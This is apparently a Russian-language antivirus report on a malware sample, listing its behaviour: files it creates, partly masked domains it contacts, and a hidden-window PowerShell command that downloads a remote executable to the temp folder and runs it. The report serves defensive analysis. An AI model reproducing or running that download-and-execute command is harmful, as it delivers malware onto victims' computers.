Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $itmdgzn как %temp%\qwdtk3.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function yyanyd7([String] $Itmdgzn){(New-Object System.Net.WebClient).DownloadFile($Itmdgzn,''%TMP%\Qwdtk3.exe'');Start-Process ''%TMP%\Qwdtk3.exe'';}try{yyanyd7(''...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1884
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\dp-ontxu.bat
- %TEMP%\934570.cvr
Сетевая активность
Подключается к
- 'de####gaanzee.nl':80
TCP
Запросы HTTP GET
- http://de####gaanzee.nl/kagasio.png
UDP
- DNS ASK hi###vonelm.de
- DNS ASK de####gaanzee.nl
- DNS ASK de#######appij.nlkagasio.png
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function yyanyd7([String] $Itmdgzn){(New-Object System.Net.WebClient).DownloadFile($Itmdgzn,''%TMP%\Qwdtk3.exe'');Start-Process ''%TMP%\Qwdtk3.exe'';}try{yyanyd7(''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\dp-ontxu.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\dp-ontxu.bat" "
